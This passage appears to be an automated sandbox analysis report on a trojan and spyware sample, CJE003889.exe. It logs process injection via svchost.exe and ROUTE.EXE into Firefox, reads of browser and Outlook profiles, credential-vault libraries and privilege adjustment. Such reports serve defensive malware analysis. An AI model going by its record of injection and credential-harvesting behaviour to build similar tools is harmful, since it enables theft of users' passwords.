Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030CEFA0	6_2_030CEFA0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03042FC8	6_2_03042FC8
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310EE26	6_2_0310EE26
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03050E59	6_2_03050E59
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310CE93	6_2_0310CE93
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03062E90	6_2_03062E90
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310EEDB	6_2_0310EEDB
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0305AD00	6_2_0305AD00
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030ECD1F	6_2_030ECD1F
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03068DBF	6_2_03068DBF
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0304ADE0	6_2_0304ADE0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03050C00	6_2_03050C00
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030F0CB5	6_2_030F0CB5
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03040CF2	6_2_03040CF2
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310132D	6_2_0310132D
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0303D34C	6_2_0303D34C
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0309739A	6_2_0309739A
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030552A0	6_2_030552A0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0306B2C0	6_2_0306B2C0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030F12ED	6_2_030F12ED
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0306D2F0	6_2_0306D2F0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0308516C	6_2_0308516C
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0303F172	6_2_0303F172
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0311B16B	6_2_0311B16B
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0305B1B0	6_2_0305B1B0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030FF0CC	6_2_030FF0CC
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030570C0	6_2_030570C0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310F0E0	6_2_0310F0E0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_031070E9	6_2_031070E9
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310F7B0	6_2_0310F7B0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03095630	6_2_03095630
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_031016CC	6_2_031016CC
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03107571	6_2_03107571
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030ED5B0	6_2_030ED5B0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_031195C3	6_2_031195C3
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310F43F	6_2_0310F43F
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03041460	6_2_03041460
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310FB76	6_2_0310FB76
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0306FB80	6_2_0306FB80
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0308DBF9	6_2_0308DBF9
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030C5BF0	6_2_030C5BF0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03107A46	6_2_03107A46
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310FA49	6_2_0310FA49
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030C3A6C	6_2_030C3A6C
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030EDAAC	6_2_030EDAAC
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03095AA0	6_2_03095AA0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030F1AA3	6_2_030F1AA3
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030FDAC6	6_2_030FDAC6
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030E5910	6_2_030E5910
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03059950	6_2_03059950
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0306B950	6_2_0306B950
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030BD800	6_2_030BD800
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030538E0	6_2_030538E0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310FF09	6_2_0310FF09
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03051F92	6_2_03051F92
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310FFB1	6_2_0310FFB1
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03013FD2	6_2_03013FD2
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03013FD5	6_2_03013FD5
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03059EB0	6_2_03059EB0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03053D40	6_2_03053D40
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03101D5A	6_2_03101D5A
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_03107D73	6_2_03107D73
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0306FDC0	6_2_0306FDC0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030C9C32	6_2_030C9C32
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0310FCF2	6_2_0310FCF2
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_02902220	6_2_02902220
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0291C090	6_2_0291C090
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_028FB2E0	6_2_028FB2E0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_028FD300	6_2_028FD300
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_028FD0DA	6_2_028FD0DA
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_028FD0E0	6_2_028FD0E0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_028FB435	6_2_028FB435
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_028FB430	6_2_028FB430
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_02903AF0	6_2_02903AF0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_02903AEB	6_2_02903AEB
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_029058E0	6_2_029058E0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_02EFE304	6_2_02EFE304
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_02EFE7C4	6_2_02EFE7C4
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_02EFE423	6_2_02EFE423
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_02EFCAE8	6_2_02EFCAE8
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_02EFCB53	6_2_02EFCB53
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_02EFD888	6_2_02EFD888

Source: C:\Users\user\Desktop\CJE003889.exe	Code function: String function: 00C88900 appears 42 times
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: String function: 00C67DE1 appears 35 times
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: String function: 00C80AE3 appears 70 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03BBF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B2B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03B87E54 appears 107 times
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: String function: 030BEA12 appears 86 times
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: String function: 03097E54 appears 107 times
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: String function: 0303B970 appears 262 times
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: String function: 030CF290 appears 103 times
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: String function: 03085130 appears 58 times

Source: CJE003889.exe, 00000000.00000003.1677477765.000000000376D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs CJE003889.exe
Source: CJE003889.exe, 00000000.00000003.1676691933.00000000035C3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs CJE003889.exe

Source: CJE003889.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@9/8

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CCA06A GetLastError,FormatMessageW,

0_2_00CCA06A

Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CB81CB AdjustTokenPrivileges,CloseHandle,		0_2_00CB81CB
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CB87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00CB87E1

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CCB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00CCB3FB

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CDEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00CDEE0D

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CCC397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00CCC397

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00C64E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00C64E89

Source: C:\Users\user\Desktop\CJE003889.exe

File created: C:\Users\user\AppData\Local\Temp\autBA2.tmp

Jump to behavior

Source: CJE003889.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\CJE003889.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ROUTE.EXE, 00000006.00000003.2325539790.0000000002ABF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3491093928.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2325667205.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: CJE003889.exe	ReversingLabs: Detection: 26%
Source: CJE003889.exe	Virustotal: Detection: 26%

Source: unknown	Process created: C:\Users\user\Desktop\CJE003889.exe "C:\Users\user\Desktop\CJE003889.exe"
Source: C:\Users\user\Desktop\CJE003889.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CJE003889.exe"
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\CJE003889.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CJE003889.exe"	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CJE003889.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\CJE003889.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CJE003889.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\CJE003889.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\CJE003889.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\CJE003889.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CJE003889.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CJE003889.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CJE003889.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CJE003889.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CJE003889.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CJE003889.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\ROUTE.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\ROUTE.EXE

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: CJE003889.exe

Static file information: File size 1229312 > 1048576

Source: CJE003889.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CJE003889.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CJE003889.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CJE003889.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CJE003889.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CJE003889.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: CJE003889.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: route.pdb source: svchost.exe, 00000001.00000003.2110719309.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2142967619.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000002.3491468868.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mcPAaApkdo.exe, 00000005.00000000.2065667127.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp, mcPAaApkdo.exe, 00000007.00000000.2215787915.0000000000D0E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: CJE003889.exe, 00000000.00000003.1677127987.0000000003640000.00000004.00001000.00020000.00000000.sdmp, CJE003889.exe, 00000000.00000003.1676009743.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2149702744.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2048458143.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2149702744.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2050143363.0000000003900000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2142320033.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2149642489.0000000002E5D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.0000000003010000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: CJE003889.exe, 00000000.00000003.1677127987.0000000003640000.00000004.00001000.00020000.00000000.sdmp, CJE003889.exe, 00000000.00000003.1676009743.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2149702744.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2048458143.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2149702744.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2050143363.0000000003900000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000006.00000003.2142320033.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2149642489.0000000002E5D000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492026833.0000000003010000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492415210.000000000363C000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2435967367.0000000016C4C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: route.pdbGCTL source: svchost.exe, 00000001.00000003.2110719309.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2142967619.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000002.3491468868.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3492415210.000000000363C000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000027BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2435967367.0000000016C4C000.00000004.80000000.00040000.00000000.sdmp

Source: CJE003889.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CJE003889.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CJE003889.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CJE003889.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CJE003889.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00C64B37 LoadLibraryA,GetProcAddress,

0_2_00C64B37

Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C764CE push cs; retf	0_2_00C764E2
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CC848F push FFFFFF8Bh; iretd	0_2_00CC8491
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C7659F push cs; retf	0_2_00C765DE
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C76500 push cs; retf	0_2_00C76502
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C8E70F push edi; ret	0_2_00C8E711
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C8E828 push esi; ret	0_2_00C8E82A
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C88945 push ecx; ret	0_2_00C88958
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C8EAEC push edi; ret	0_2_00C8EAEE
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C8EA03 push esi; ret	0_2_00C8EA05
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C78C74 push esp; retf	0_2_00C78C76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00415ED3 push ebx; iretd	1_2_00416003
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004149FF push cs; iretd	1_2_00414A15
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004031B0 push eax; ret	1_2_004031B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00415AC5 push esi; retf	1_2_00415AC9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004183BF push ebx; ret	1_2_004183C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00415C9E push eax; iretd	1_2_00415CA2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411D0F push cs; iretd	1_2_00411D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00414DF9 push FFFFFFB4h; retf	1_2_00414DFD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411E22 push esp; ret	1_2_00411E23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004016FF push edi; ret	1_2_00401701
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041468B push ecx; ret	1_2_0041468C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040171C push ss; ret	1_2_00401723
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00415F38 push ebx; iretd	1_2_00416003
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418FDC push edx; iretd	1_2_00418FDD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B0225F pushad ; ret	1_2_03B027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B027FA pushad ; ret	1_2_03B027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B309AD push ecx; mov dword ptr [esp], ecx	1_2_03B309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B0283D push eax; iretd	1_2_03B02858
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0301225F pushad ; ret	6_2_030127F9
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030127FA pushad ; ret	6_2_030127F9
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_030409AD push ecx; mov dword ptr [esp], ecx	6_2_030409B6

Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00C648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00C648D7
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CE5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00CE5376

Source: C:\Users\user\Desktop\CJE003889.exe

